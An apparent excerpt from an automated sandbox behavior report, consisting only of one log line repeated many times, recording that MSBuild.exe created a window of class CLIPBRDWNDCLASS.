                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
